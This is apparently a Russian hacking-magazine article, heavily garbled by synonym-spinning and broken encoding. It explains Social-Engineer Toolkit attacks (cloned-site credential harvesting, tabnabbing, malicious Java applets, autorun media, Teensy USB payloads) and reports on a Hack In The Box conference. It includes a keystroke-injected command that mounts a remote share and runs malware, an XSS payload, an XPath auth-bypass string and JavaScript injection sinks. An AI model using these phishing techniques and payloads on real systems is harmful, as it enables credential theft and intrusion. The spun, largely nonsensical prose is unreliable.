критической уязвимости (есть содействие Linux. Чтобы определить.

идеже симпатия расположен. каковой может балдеж коптеть равным образом через веб. чтобы которого можно невыгодный творить деланный сайт. «Идут профилактические работы». Данная удар формирует специальную страницу. Для сего возле рассылке на машинопись корреспонденция добавляем URL. даже если замысел принимает его. Метод «Man Left in the Middle Attack» был внесен на toolkit человеком вместе с ником Кос да использует HTTP REFERER для сбора данных с полей. WARNING warning Внимание! Информация представлена исключительно с целью ознакомления! Ни автор. Получается.html — запись в блоге g0tmi1k.org — сайт относительно Exploiting Human Vulnerabilities • g0tmi1k.. которые ламер заполнил на сайте. указав всего лишь директорию на диске. автора Social-Engineering Toolkit (SET) • offensive-security. пупок развяжется ты да я хотим брать аутентификационные данные. А тогда наша страничка работает сродни методу Credential Harvester. а зачем скинули оценить по мессенджеру ICQ. равно интересах сего глотать редюит «The Metasploit Browser Exploit Method».6. для которой наперво красуется надпись «Please wait while the site loads. Естественно. Первое.bit. а ужотко — дело техники. «Идет загрузка . Так почто штурм может конституция до этих пор паче мощной равно красивой. захочет подвергнуть проверке свою почту во данном окне (не набивать же домицилий вновь во новом). Ну и. Skype. однако его проблема заключается во сборе всей информации.6. равным образом с намерением читатель безграмотный заметил подвоха на адресной строке.HTTP://WWW links Teensy USB HID Как упоминалось ранее. так можно. эксплуатацию уязвимостей браузеров никто не отменял. на этом месте деяние ограничивается лишь твоей фантазией.. Уже во нижеуказанный раз. предварительно плотный со через сервиса www. в такой мере равно нетрудно страницу с ошибками «404». раскрутить юзера войти согласно ссылке то-то и есть со через IE — во вкусе показывает практика. и.». наверное. В принципе. стоит только остановиться только получай «Java Required». «Содержание данного сайта несоединимо с вашим браузером.. в таком случае SET беретик получи и распишись себя первую доза плана да справляется из ней нате «отлично». наша подготовленная полоса изменит кровный поверхность получи лик страницы от популярного почтового сервиса. конечно. к ее проведения. симпатия наткнется сейчас возьми страшно осведомленный ему интерфейс и.. Как единовременно получи и распишись это и рассчитана Tabnabbing-атака. SET обалденно работает во связке с ettercap. В таком случае жертва наместо оригинального сайта попадает нате наш поддельный сайт. дай тебе что-то просмотреть во будущем равным образом т. звонка изо техподдержки провайдера. Так в качестве кого настоящий градиент сводится для созданию подложного сайта да заманиванию нате него жертвы. Второй порядок самый приятный — сие полное клонирование веб-страницы любого сайта.». так чтобы у него на машине стояла Java. да подробная правила относительно том. градиент атаки вследствие почту не предоставляет внутренние резервы отправки нормального файла. Главное. равно он переключается сверху другую вкладку во браузере. За этакий поразительный Java Applet мы должны произносить благодарствую Thomas Werth. применив социальную инженерию. равным образом начиная с версии SET 0. Java Applet спуфит лицемерный Java Certificate. email-рассылки.blogspot. имеет смысл вспомянуть по отношению первом векторе атаки. Twitter Java Required Êëîíèðîâàíèå ñàéòà Ñîáñòâåííûé ñàéò Среди сайтов-заготовок. что такое? нас невыгодный интересует. Говоря по части почте. Естественно. же об этом символически позже. сие тотально возможно.1 • Open-relay — это когда почтовый сервер разрешает пересылку почты куда приятно да кому угодно. но ни один человек невыгодный мешает в дальнейшем создания файла подменить его нате правильный на /pentest/exploits/SET/src/program_ junk/<name_file>. чтоб потерпевший нисколько малограмотный заподозрила да как можно длиннее пробыла держи сайте. нате ней запускается XÀÊÅÐ 00 /141/ 00 metasploit payload. У многих людей быть серфинге интернета с поднятым забралом бесчисленно вкладок: про почасту посещаемых сайтов. Метод «Credential Harvester» архи прост что на реализации. в чем дело? автор сих строк видим. com/metasploitunleashed/SocialEngineering-Toolkit — сайт Metasploit Unleashed об использовании SET • social-engineer. каковой хорошенького понемножку поджидать своего часа. когда расход хорошенького понемножку просматривать домашние вкладки. Самым главным достоинством данного метода является то. предоставляя нам три варианта создания такого будто сайтов: • è • • Çàãîòîâêè Gmail. допускается употребить ARP-spoofing. кой ОС равным образом каким браузером пользуется пользователь. Facebook. Этот прием является единственным.com — сайт David Kennedy (ReL1K). • secmaniac. выходит к тому идет пустить в дело SSL (как самоподписанный. когда пользователю надоедает выжидать загрузки страницы. этак да предварительно накупленный сертификат). попробуйте растворить ссылку со помощью IE». Так как превалирующая новых эксплойтов пробивают для IE (не факт. потерпевший должна фигурировать в нашей а подсети. подле попадании получай который появляется страничка от сообщением. С большим количеством открытых вкладок равным образом со течением времени хватит трудно вспомнить. которую ушан юзер ввел получи и распишись странице подготовленного нами сайта. так равно во применении. как ее установить. возможно.д.. что наша сестра просто-напросто используем XSS получи реальном сайте во режиме Credential Harvester да получаем необходимый нам profit. Jabber сиречь e-mail. И новейший порядок дает возможность поднять собственный личный сайт. автора metasploitfakeUpdate INFO info • Последняя актуальная версия SET получай момент выхода статьи — v0. Для сего хватит лишь сообщить toolkit’у надобный URL.ly (или ему подобным). Здесь не запрещается развернуть как который-нибудь великий сайт. Через изрядно секунд ты да я сделано имеем копию любой веб-страницы. зачем открыл сам. что дар им пользуется).. Также залучить пользователя получай выше- сайт дозволяется вместе с через XSS. Google. ни редакция за твои действия ответственности не несет! 051 . а затем. зачем в целях ее просмотра необходима Java. com/2010/05/scriptvideo-metasploitfakeupdate-v011. Лучше общем заданный трюизм выбирать при проведении атаки Java Applet. главное. да надлежит реальность уязвимости как XSS держи реальном сайте. Так почто со его через очень просто изготовить аутентификационные материал шиш невыгодный подозревающего пользователя.pdf. материал с которого нас интересуют. Здесь SET сверху созданную нами страницу помещает эксплойт. зайдя во глава web-attack — это The Java Applet атака.1. Да.

всего незаметность) получаем предметный путь для системе равно незаметно. Единственным недостатком является то. флеш-память 02-128 Кб. Оно также не нуждается во специальных драйверах и. WSCRIPT HTTP GET MSF равно Powershell based Reverse Shell. может состоять неощутимо известно нате компьютер. что оно определяется на системе немножко дольше. шикарно own"им ее. которое понимает USB HID out of the box! Теперь на манере агента 007 (никаких убийств. ремесло осталось вслед за малым — потопить нужную нам нагрузку на pde-формате получи и распишись Teensy. что-нибудь по образу следствие. что такое? оно является программируемым и определяется на системе наравне USB-клавиатура. 052 Сообщение в рассуждении критической уязвимости. А из привлечением автоматизированных средств сие становится совершить намного более нетрудно да массово. SET позволяет сотворить требуемый факты для такой атаки. Teensy USB в борту имеет AVR-процессор со частотой 06 МГц. моего друг.exe (наш payload) равно autorun. что-то около что-нибудь пробив растет. что Teensy USB HID (human interface device). некоторый деликатно поинтересуется о твоих предпочтениях во payload. нежели обычное USB U3 устройство. Если данного набора тебе недостаточно. на зависимости с модели. В результате во корневой папке SET появится папенька autorun от двумя файлами: program. пока хозяин механизмы отвлекся. Записываем намоленный факты держи CD/DVD/USB и подсовываем жертве. имея жуть маленький размер. зачем безграмотный сможет ни одинокий эксплойт. в таком случае не запрещается написать свой payload получай C либо — либо использовать в своих интересах Arduino IDE.. CONCLUSION Как видишь.5-8 Кб равно стоит этот маломерок $18-27. Правда.inf. Teensy — сие беда маленькое программируемое механизм со mini-USB интерфейсом.exe. И сие пока что никак не целое — механизм обладает таймером равно датчиком. запускающий program. однако сие того стоит. TEENSY USB HID ATTACK VECTOR Благодаря IronGeek да WinFang на SET появился ёбаный изощренный вектор атаки. в такой мере в чем дело? данное направление проникновения на систему по этих пор представляет обусловленный интерес. количестве итераций кодирования нагрузки (для AV bypass) равно порта про reverse-connect. что такое? дает вероятность запуска начинки при определенных условиях. RAM-память 0. какой а там вместе с помощью Arduino IDE равно Teensy Loader согласно USB заливается держи устройство. согласен и LNK-эксплойт в всю свирепствует.ВЗЛОМ mfu во действии CD/DVD/USB ATTACK VECTOR Далеко безграмотный у всех во настройках отключена автозагрузка.pde. позволяет отшагать какой приглянется приказ получай автозагрузку равно т. В общем. И это только лишь начало. Растет равно количество пользователей ПК. социальная конструирование набирает новые обороты — вследствие ей дозволительно выстрадать того. аюшки? на качестве нагрузки допускается пустить в ход Powershell HTTP GET MSF.д. z XÀÊÅÐ 00 /141/ 00 .. для сего придется маленько раскошелиться. Вот тогда вроде крата нам равно поможет SET. а чисто компьютерная квалифицированность — только лишь падает. Прелесть данного устройства заключается на том. Для сего нельзя не применить пунктом меню Infectious Media Generator. Encoder. Стоит отметить. сие лишь только начало. создаваемое mfu он генерирует нашу нагрузку на teensy.

Ñæëìáíá .

который автор этих строк далеко не осветил. Saomuil Shah (из NetSquare) и. рассказывал о русских блекхатах равно криминалах. паче того — картотека со всеми докладами прилагается ко диску. по сию пору лучшее делается на завершающий момент. начить воздвигать мосты между двумя разными подходами: Compliance First равным образом Security First. И весь они произвели кончено приятные впечатления. кризис миновал посмотрим. приближенно как. нежели пишущий сии строки собственно и занимаемся держи международных конференциях. почто еще порядком поднадоело.ВЗЛОМ Александр "sh2kerr" Поляков ÍÀØÈ ÍÀ HITB Ìèðîâûå äîñòèæåíèÿ ýëèòíîãî âçëîìà  ýòîé ñòàòüå ÿ ïîâåäàþ òåáå îá îäíîé î÷åíü õîðîøåé è èçâåñòíîé êîíôåðåíöèè — Hack In The Box. Алексей Синцов. ëþáåçíî îòîáðàííûõ äëÿ òåáÿ èç ýëèòíûõ âûñòóïëåíèé. чтобы. во конце концов. докладам. В докладе была освещена его любимая положение — пригодность стандартам равно реальная безопасность. Его мессадж был на том. Íó è. óçíàåøü ìíîãî íîâûõ è èíòåðåñíûõ õàêåðñêèõ ìåòîäèê. кто такой а выступал на конференции. да пройдемся за особенно интересным. специализирующегося на вопросах PCI DSS равно лог-мэнеджмента. ÂÏÅÐÅÄ! Итак. Федор Ярочкин. начнем от того. начнем из больше общего описания докладов. разве что. да один человек же. идеже посчастливилось комфортно покорпеть и доделать свою презентацию. самые интересные изо которых наша сестра на конце рассмотрим подробнее. Событие для самом деле знаковое. естественно. Итак. дроп равно прочее. же и интеллигентные да образованные этичные хакеры. получи муж взгляд. объясняя сообразно быстро презентации.  íåé òû óçíàåøü.. составитель известной утилиты X-Probe и. Laurent Outdot (директор компании TETHRI Security). êòî âûñòóïàåò ñ äîêëàäàìè. XÀÊÅÐ 00 /141/ 00 . что значат такие термины. Дубай) равно до этих пор отнюдь не скупятся для места проведения. что-то на России живут безвыгодный исключительно Блекхаты. бывший работник Qualys). Путешествие было со пересадкой во Германии. произнесенные нате конференции T2 во Финляндии). Еще один выше- соотечественник. известного эксперта на области безопасности. твоя милость ввек можешь скачать во интернете и разобраться во них самостоятельно. за исключением натурально вечных шуток относительно русских хакеров. Федор Ярочкин (наш соотечественник. наконец. на правах противник Чувакин (независимый консультант. как например равно конференции некоммерческие. равным образом составитель знаменитой XProbe). отколь моя особа прямиком на поезде направился на Амстердам. который наша исследовательская лаба во составе двух человек. На конференции выступали такие специалисты.. ÷òî ïðîèñõîäèò íà òàêèõ êîíôåðåíöèÿõ. так на правах сообразно факту ни одна собака изо русских исследователей (имею во виду живущих во России) в настоль значимых конференциях безграмотный выступал. кроме. да что русским первоклассно бы общо завесить ход на всемирная паутина (слова Микко Хайпонена изо Fsecure. должен рассказать всему миру. à òàêæå ÷òî òâîðèòñÿ ïîìèìî äîêëàäîâ. Лас-Вегас. Для нас. эмигрировавший на 0000-х в Тайланд. со двумя разными докладами была приглашена получи и распишись конференцию Hack In The box во Амстердаме. таких во вкусе ваш покорный слуга равно по всем статьям гласный моего коллега. коих сейчас было посещено немало. Те. объединение совместительству. ÎÁÎ ÂÑÅÌ ÏÎÍÅÌÍÎÃÓ Конференция началась со вступительного стихи Антона Чувакина. так что однако бог держи высоком уровне. затем что ради державу-то обидно. наравне картон. В появляющийся однова замечаю. конечно же. что-то организаторы конференций выбирают ради их проведения интересные места (Амстердам. представители DSecRG. Криса Касперски. êîíå÷íî æå. легко прикольный парень. хватает вводных слов. 054 Итак. конечно.

что такое? тебе необходимо поставить невредность да степень доверия в целях крупного проекта. либо поуже успел позабыть. Для тех. ась? малограмотный однако сии нововведения доступны. прозрачные прокси. потому что до этих пор находятся во разработке.net. 2. показывая. хотя европейцам. в отдельных случаях он был рассказан впервые. да рассказывал его единолично мои знакомый. Определение версии ОС возьми основе приложений равным образом корреляция данных. назывался «How to rate the security of closed source software». Идея его такова: подумай себе. в духе усилий дозволено от клиентов SAP нахватать подход ко корпоративным секретам компании. реализующие спуфинг атаку. что куда хоть животрепещуще рядом анализе больших подсетей). используемой для удаленного определения версии ОС. Кроме того. видать. на итоге во разы увеличив резвость его работы. тот или иной собрал немало народу в своем выступлении. круто отличаясь от того но Nmap счетом посылаемых пакетов (в меньшую сторону. пожелаем удачи Федору да неграмотный забываем залетать бери сайт его проекта — http://xprobe. ханипоты. описывая особенности написания шеллкода к метода JitSpray. какие метрики использовать. От себя добавлю. ко примеру. Michael Thumann изо компании ERNW. в чем дело? бессонные ночи по-над этой XÀÊÅÐ 09 /140/ 00 Главный зал ожидания конференции. ориентировочно тысячи бинарников. да во деление с них: 1. 3. а вот и все показав. Ïðîâåðêà èñïîëüçîâàíèÿ â áèáëèîòåêå ASLR (ðàçðàáîòàíî). Поддержка IPv6. было весть интересно. Следующий доклад. Реально крупного проекта. Что а делать? Ответ прост — во качестве альтернативы предлагается воспользоваться разные метрики. В новой версии появилось куча нововведений. Будем верить на их скорейшее появление. ась? сие засада неграмотный всего только Flash. в отношении котором желательно бы рассказать. рассказываю. Остается всего только разобраться. Автор предлагает следующие: Ïðîâåðêà èñïîëüçîâàíèÿ â áèáëèîòåêå DEP (ðàçðàáîòàíî). эту мы презентацию пропустил. однако сие уж совсем другая история. К сожалению. симпатия продемонстрировал (почти успешно :) атаку нате последнюю версию JIT-компилятора в браузере Apple Safari. Улучшенный движок. прискорбно только. таких как кэширующие системы. Подробности твоя милость можешь зацитировать в предыдущем номере. не подходят — чрезвычайно ресурсоемко. В целом важно неплохо. 055 . используя нашу тулзу — sapsploit. файерволы уровня приложений равным образом аж хосты. Этот хрия моя персона приметил пока что получи конференции Troopers. Определение отнюдь не всего только ОС. который во танке. идеже допускается было пообщаться со коллегами за всему миру презентацией были проведены Алексеем далеко не ни за что — народу истинно понравилось. Помимо сего ми в свой черед посчастливилось одарить небольшое опрос на BBC Radio1 касательно безопасности ERP. минимизирующий необходимое количество посылаемых пакетов. приближенно на правах своевольно на сие время был для параллельном треке — рассказывал относительно устойчивость ERPсистем для примере SAP. Нельзя далеко не обозначить мои коллегу. системы обнаружения равно предотвращения вторжений. Алексея Синцова. Необходимо отреагировать возьми вопрос: можем ли наша сестра доверять этой программе обработку наших критичных данных? Стандартные подходы. но да любого JIT-компилятора. да да различных девайсов. свичи. реверс-инжиниринг да сандбоксинг. Кроме презентации оборона русских криминалов Федор также рассказывал относительно новой версии своего старого детища — XprobeNG. такие в духе фаззинг.Корабль. виртуальные машины. равным образом требует обученного персонала. 4. получая на результате по по всем статьям проверкам энский сплошной список перед названием Thumann’s Trustworthiness Index. держи котором проводилась Afterparty конференции HITB все сие безграмотный ново.sourceforge. XProbe в олдскульные время была культовой программой.

об котором поведал ее разработчик. которые должны народиться на продаже от 06 августа. которые твоя милость можешь снарядить во любых комбинациях. возлюбленная может определить. вроде налаженность обучилась. а который-нибудь плохой. IDS/IPS. что-то было заявлено. В общем. Ïðîâåðêà íà íàëè÷èå ïîäïèñè êîäà (â ðàçðàáîòêå). была о новом устройстве почти названием kane-box. Наконец. на правах возлюбленная работает во нормальном режиме. Система обучения основана на экспертных системах. что-нибудь вещун представил тулзу. неплохая получилось утилита. На них. Так равным образом не без; kane-box. Ïðîâåðêà íà èñïîëüçîâàíèå íåáåçîïàñíûõ ôóíêöèé (â ðàçðàáîòêå). которая осуществляет шпалеры сих проверок да выдает переводный индекс доверия ко анализируемой программе. Результат получился смешанным — часть библиотек имеют большой ярус доверия равно скомпилированы с использованием DEP да ASLR. Ïðîâåðêà. В случае самостоятельной сборки равно установки получится до данный поры дешевле. термин open source hardware появился только что равно стремительно набирает обороты. Да-да. приблизительно как. найдя на них уязвимость. это мирово работало. потратив бери сие незначительно в меньшей мере денег. Устройство представляет собой систему обнаружения вторжений. и стоит изменить забота держи следующем. которым никуда не денешься соответствовать 056 Автерпати традиционно спонсируют Microsoft чтобы отвлечь хакеров примерно недолго ото взлома своих продуктов )) Русские вайтхаты со лева в прерогатива : Федор Ярочкин. Ïðîâåðêà íà èñïîëüçîâàíèå ñåòåâûõ ôóíêöèé (â ðàçðàáîòêå). Ïðîâåðêà íà îáðàùåíèå ê ðååñòðó (â ðàçðàáîòêå). во вкусе на Cisco PIX (по заявлениям разработчика). Ïðîâåðêà íà ñîçäàíèå ôàéëîâ (â ðàçðàáîòêå). Так аюшки? желаем успехов создателю равным образом ждем первых образцов. ась? виновник выпускает базовые азы девайса. хотя невыгодный полагаться автору что-то во вкусе невыгодный от в чем дело? — спирт был основателем XÀÊÅÐ 00 /141/ 00 . а кусок — нет. будем надеяться. хорош в сущности работать. Разработчики всецело отказались через сигнатурного метода равным образом реализовали значит поведенческий движок. нежели получи и распишись покупку готового варианта. которая одновременно представляет с лица маршрутизатор. экая досада только. Смысл на том. зачем на скором времени симпатия продолжит свое развитие. èñïîëüçóåòñÿ ëè óïàêîâùèê (â ðàçðàáîòêå). сколько-нибудь слов по отношению том. особенно интересах тех. корпоративный файервол равным образом систему обнаружения/предотвращения вторжений стоимостью во $1250. Алексей Синцов PCI DSS. убирать разночтение elite под серверную стойку из несколькими сетевыми интерфейсами. В качестве подопытного была проанализирована папка браузера Firefox. базах знаний равно теореме Байеса. Утилита запускается очень просто. равно симпатия выдаст результат по во всех отношениях файлам. надлежит сказать. Казалось бы. которую у меня получилось посетить. но. какой пробка хороший.ВЗЛОМ Я собственной персоной Алексей Синцов Ïðîâåðêà èñïîëüçîâàíèÿ â áèáëèîòåêå SafeSEH (ðàçðàáîòàíî). ÇÀÃÀÄÎ×ÍÀß ÊÎÐÎÁÊÀ Следующая лекция. Надеюсь весь то. а конкретнее — пусть даже мешанина роутера. При запуске построение строит модель текущей узы да запоминает. ñêîìïèëèðîâàíà ëè áèáëèîòåêà ñ îïöèåé /GS (â ðàçðàáîòêå). будет выделить ей директорию. правда до этих пор да со возможностью анализа беспроводных сетей. даже если выкупать напрямую у разработчика. операционную систему равно пусть даже железо. и. исходя изо своих знаний о существующих атаках равно в рассуждении твоей сети. Саныч Поляков. Прелесть заключается на том. После того. ничто нового. только весь теория основана для OpenSource. эксплуатировать ее склифосовский намного проще. Ïðî÷èå ïðîâåðêè. собственно. вроде сие работает. включая приложение. John Kanen Flowers. Подобные эксперименты ваш покорный слуга проводил сызнова на институте — обучал систему обнаружения вторжений присутствие помощи нейронных сетей. И все это вслед за $250 (с поддержкой WiFi — $300). Ïðîâåðêà. широкий Чувакиеин. Ïðîâåðêà âåðñèè ëèíêîâùèêà (ðàçðàáîòàíî). сколько все еще немножко проверок включено. Кроме того. а презренный металл ограничены. сделано паче глубоком этапе анализа безопасности софтины. Очень удобное уступка про маленьких компаний. некоторый представляет собой небольшую коробочку размером в меньшей степени точки доступа равным образом аппаратной начинкой.

0 исследователь. ведь благодаря этому бы отнюдь не сэмулировать сии образ действий своим устройством. далеко не однажды замечал.com.com/welcomescreen/iwork09/numbers/ apple. В докладе некто описывал различные атаки. Под «клиентами» спирт имел на виду различные устройства: с ноутбуков равным образом КПК по не без; мартфонов. которые дозволяется сопровождать для клиентов. могут узнать подробнее об этой коробочке сверху kane-box.1. преимущество пронюхать информацию что до клиенте в таком случае минимальны. показывающая информацию о web2. догадывался малограмотный одиночный исследователь.4&os=Darwin&buildi d=20100317134139 Не говоря еще насчёт продуктах Apple кайфовый эпоха работы вместе с iWork равным образом iLife: Таким образом возлюбленный заставил пользовательский нотбук открыть окно запуска команд. «Web in The Middle». Итак. да они есть. может быть. в духе указал на одном с последних слайдов XÀÊÅÐ 00 /141/ 00 apple. Представь себе. примонтировать сеточный пластинка да выполнить с него вредоносную программу. Опять-таки. был с Laurent Oudot изо компании Tehtri Security. сколько я. ты станешь первым. Смысл на том. Кроме того. только дьявол неграмотный проверял. Те. аюшки? возьми расстоянии пяти метров возлюбленная работает стабильно. что-то делает атакующий возле нападении на клиента — сие разведка. В качестве примера был продемонстрирован нижеупомянутый комбинация команд. Вот благодаря этому моя особа век пользуюсь тачпадом. Как знать. кто такой заинтересовался. Вотан изо примеров — браузер Mozilla подчас отправляет информацию в отношении своей версии на сайт производителя в области нешифрованному каналу чисто таким вот запросом. когда со через презентационной указки дозволяется производить небо и земля поступки со монитором.1/x&x:x [Enter] Следующий захватывающий доклад. Вживую сие выглядело довольно шокирующе.Официальный сайт конференции Утилита Appprint. равно выяснилось. кстати. посылая аналогичные сигналы. который твоя милость перехватываешь общение клиента со каким-либо веб-сервисом. наверное. что.0. равным образом затор зашифрован при помощи SSL. сосредоточившись на HTTP-протоколе.com/welcomescreen/iwork09/keynote/ 057 . В двух словах — сие неграмотный текущий студент с академическим буллшитом. кто такой сие сделает? :) Между делом ты да я решили протестировать радиус поведение мышки. пользуясь всеми любимой Tamperdata: http://live. но этот хлопец осуществил ее в практике. от беспроводными мышками умозрительно возможна та а история. подосланный держи компьютер: [Win+R] cmd /c net use x: http://10. айфонов да новомодного айпада.com/%APP%/ whatsnew?locale=%LOCALE%&version=%VERSION %&os=%OS%&buildid=%APPBUILDID% Thunderbird в свой черед светит версию: http://live.mozillamessaging. так пишущий эти строки отнюдь не стану перетолковывать имена транслитом) под названием «Hacking Wireless Presenters». Казалось бы. ÏÎÃËÓÌÈÑÜ ÍÀÄ ÑÒÈÂÎÌ ÄÆÎÁÑÎÌ Многим понравился выступление исследователя Niels Teusink (да простят меня редакторы. WEB IN THE MIDDLE Пример работы сканера wsscan небезызвестной компании nCircle равным образом автором оригинального движка сканера Ncircle Suite 060.com/welcomescreen/ilife09/iphoto/ apple.mozillamessaging.com/thunderbird/start? locale=en&version=3. первое.1. изучив акт да соорудив специализированный девайс. до самого теории возможной атаки.

ми было архи забавно посмотреть. зачем а такого мог взять от потолка Shreeraj Shah.0 (Macintosh. хоть бы большинство из атак были известны ранее.CSRF with XML. Тема не новая. Уязвимость нулевого дня во браузере Safari подо Ipad была продемонстрирована стоймя получи и распишись презентации получай новеньком Ipad. а в суровых боевых условиях. 7.execCommand(…) document. представленные тулзы чтобы их автоматизации оказались бог хоть интересными.assign(…) XÀÊÅÐ 00 /141/ 00 . меню десяти популярных Web 0. Напоследок извещатель рассказал относительно целом списке 0-day уязвимостей. Изучим больше всего интересные моменты. DAP [Download Accelerator]. Итак.body. Intel Mac OS X 00_6_3. speedbit.write(…) document.writeln(…) document.Dom based XSS — Ajax.location.0 Те. Как бывшему фанату веб-атак да всего.0. Blackberry и. 10. вдобавок далеко не всего-навсего во вымышленной академической среде. 4.SQL injection — SOAP & XML.forms[0]. найденном их компанией во популярных девайсах.org/https-everywhere. Кстати. и. почто с ними связано.com/welcomescreen/iwork09/pages/ – "GET /welcomescreen/iwork09/pages HTTP/1.location=… document. Winamp. Приятно.body. OpenOffices. Утилита поддерживает подмену обновлений интересах следующих продуктов: • • • • • • • • • • Java plugin.hostname=… document. Как выяснилось позже. конечно.attachEvent(…) document.0 атак получи и распишись 0010 бадняк выглядит следующим образом: 1. которая. MacOS. в которые не грех насадить злокозненный JavaScript-код: document. like Geck Один с возможных вариантов атаки позже этакий разведки — сие поддвижка клиенту ложных обновлений.com. 6. Linkedin Toolbar.ar/down/isr-evilgrade-Readme. 2.create…(…) document. 5. en-us) AppleWebKit/533. благодаря чего почто напоследок я припас самое сладкое. кто такой дочитал по сего раздела — молодцы.attachEvent(…) document. да набирающая обороты во рычаги не без; наплывом Web 0. Winzip. 1. каста назначение сделано решена вплоть до нас в утилите ISR-evilgrade (infobyte.0 равным образом повсеместным использованием во Ajax-приложениях следующих методов. iTunes. Notepad++. аюшки? некоторый такие идеи воплощает на жизнь.Widgets/Mashup Exploitation.Blind SQL over JSON. Начнем от первой атаки — межсайтовый скриптинг сквозь DOM. склифосовский готова. написанной командой Infobyte Security Research. во рамках 058 Резултат работы утилиты s tticheck на популярном браузере firefox уже порядком изъезженной темы атак в Web 0. 9.Auth Bypass-XPATH and LDAP. Помимо сего симпатия имеет API с целью написания собственных модулей.location. во вкусе единовременно на мгновение написания статьи разработчик анонсировал новую версию своей утилиты. … window.replace(…) document.txt). ÄÅÑßÒÊÀ ÍÀÈÁÎËÅÅ ÎÏÀÑÍÛÕ ÀÒÀÊ ÍÀ WEB 0. IPad. патрон компании BlueInfy. U. HTC. Кстати. 3. известие получился воистину полезным. неравно они осуществляются по небезопасному протоколу. таких по образу Iphone.Decompilation Attack and Info Leakage. В качестве одной с контрмер предлагается пускать в ход надстройку для Firefox — eff.ВЗЛОМ RAZ0R HTTP://RAZ0R.location.innerHtml=… document.XSS with Flash.WSDL scanning and API exposure — Cloud. нет-нет да и твоя милость будешь перелистывать сии строки. К счастью. либо всетаки нет? apple. констатирует Алексей.16 (KHTML. да они реально работают. дословно при помощи неделю впоследствии конференции были опубликованы подробности множества 0-day почти неодинаковые девайсы через автора презентации. вероятнее всего.NAME «Jit spray мертв!».Business Logic Bypass.1 » – "Mozilla/5.action=… document. 8.

установленных в сервисе. бери самом деле. Неудивительно. были устроены соревнования изо серии «Capture the flag». substring(0. Кстати. на админке сайта убирать функционал загрузки файлов. В докладе вот и все использовались разные утилиты с целью упрощения анализа Web 0. "_blank"). делал руками. обратившись согласно следующей ссылке http://url/to/flash-file. Web2Proxy (Beta) — аналогичная утилита.URL=… window. Предположим. AppCodeScan 0. на всеми друг услуги Vkontakte.zip равным образом познать самостоятельно.clickTAG.0 проектов: DOMScan (Beta) — тулза в целях анализа DOM-модели сайта получай предмет выявления XSS-уязвимостей. трассировки стих да поиска логических ошибок. тулза архи юзабельная. вдобавок на каждом слове во XML-запросах слыхом не слыхано осмотр источника.swf?clickTAG=javascript: alert("xss") В качестве защиты позволено проэксплуатировать такую конструкцию: on (release) { if (_root. Но про простейших атак. 2. Web Service Discovery Language — язык описания веб-сервисов. равно они равно как нуждаются на светлых умах. Как всего лишь далеко не извращались из уязвимостью CSRF.0. а автор сих строк подсовываем админу ссылку. придумывая целое новые равно новые подвиды (например. на основном. кто такой ни бери не уходи безвыгодный может кейфонуть через взлома. что-то самое главное. уйти насчёт себя необходимую информацию. Это весть критичная информация. È ÅÙÅ! Кроме общей сложности прочего сверху конференции была прилавок HitbJob. как ни странно. а Xpath с другим синтаксисом. лишь только минус внутренние резервы модификации. Binging(Beta) — навороченная учение получения информации об сайте и его поддоменах (и наоборот). выполняемых по-над сообщениями. Подробнее об этой атаке позволено ценить тут: pentestmonkey. проводимую нате корабле. реализуемый посредством GET/ POST-запрос.0. Основана получи API Bing. я получим подступ для системе ото лица первого юзера на списке. я получим следующую информацию: веб-сервер nginx/0.2 — обслуживающая программа на поиска уязвимостей во исходных кодах приложения. используя небо и земля фаззинг-методы.navigate(…) Если список-то. получая ответы. которая может помочь рядом дальнейших атаках. 3. которые удобно посылать возьми сервер. ажно синтаксис таковой же. используя следующие запросы: Inurl:wsdl Inurl:asmx Для упрощения данных атак позволительно эксплуатнуть утилиту wsScanner. ко примеру.0 сердце — script. Для декомпиляции SWF-файлов. В общем.6)=="https:" || _root.substring(0. com/DOMScan. 5. Декомпиляция равно XSS вследствие Flash.net/ blog/csrf-xml-post-request. основанный возьми языке XML.document. дозволяется да создавать СSRFатаки.aculous. } Этот адрес получает возьми ход параметр clickTAG. безграмотный чрезмерно удобных утилит. поданной на вход. преображать посылаемые запросы. Для тех. плавающем по части каналам Амстердама.clickTAG. осуществляющий трассировку DOM у Web 0. Для поиска веб-сервисов равным образом их XÀÊÅÐ 00 /141/ 00 файлов описаний позволено прибегнуть гуглом. позволительно применить утилитой SWF decompiller. нахватать работу в какой-нибудь международной компании. и. запрещается безвыгодный наметить грандиозную вечеринку по части поводу окончания конференции. а заинтересовавшиеся могут скачать тулзу вместе с blueinfy. известен. что. поперед ее выпуска приходилось эксплуатировать много других. Предположим. используемый Web 2.ru. которая помогает нахватать величина XML-сообщений. а и список операций. DOMTracer (Beta) — плагин интересах Firefox. ко примеру. } } Дополнительную информацию по части данной теме не запрещается почерпать из докладов: • OWASP Flash Security Project • «Blinded by flash» (slides as pdf) by Prajakta Jagdalen — Blackhat DC 2009 • «Neat. идеже команды соревновались среди на лицо на искусстве взлома равным образом защиты.0 сайтов. где-то в чем дело? несомненно кто-либо изо вас проводил эту атаку. равно кривая вывезет на скорую навстречу на Малайзии! z 059 . которым оповещение хорошенького понемножку доставлено. тама ажно была стойка компании Google. Еще одна интересная свойство крупных конференций на том. которые некто проводит бери различных конференциях. clickTAG. New. Представляет собой XML-файл особенного формата.7. которая автоматизирует развертка Dom-based XSS в целях меня была нова — раньше как-то все. равным образом способ. что обычно первые двоечка дня нате них идут мастер-классы. за исключением того.clickTAG. Для чего нам декомпилировать код? Ну. Наконец. Обход авторизации от X-Path. Web2Fuzz (Beta) — прокси фаззер. таких вроде огибание авторизации.5)=="http:" || _root. Так ась? хочу отблагодарить организаторов. проследовать фаланга тестов и. Запустив ее. реализующая подробный разбирание Web 0. Таким образом. Blackhat да прочие. используя XML-протокол. реализующая фингерпринтинг серверных приложений. коим в большинстве случаев является администратор. В результате банальной последовательности " or 0=1 or ""=‘. загружая обязательный нам файл. равным образом никак не проводит его анализ на валидность. который это. разве кому интересна данная проблематика — получай сайте автора есть информация в рассуждении трех его книгах равным образом вагон иной полезной инфы по взлому Web 0. CSFU — Cross site file upload либо межсайтовая нагрузка файлов). and Ridiculous Flash Hacks» by Mike Bailey — Blackhat DC 0010 • «A Lazy Pen Tester"s Guide to Testing Flash Applications» 4. на процессе декомпиляции мы обнаружили следующую строку: on (release) { getURL (_root. на коде у нас присутствует такая строка: string credential= "//users[@username=""+user+"" and трафика. ради того. CSRF with XML. что такое? держи серверной стороне у нас безграмотный SQL.1)=="/") { getURL (_root. даже если сам по себе никак не подозревая в отношении том. во котором определяется обличие отправляемых да получаемых сервисом XML-сообщений. возможно. заточенный перед разряд да модификацию JSON равно XML-протоколов.clickTAG. 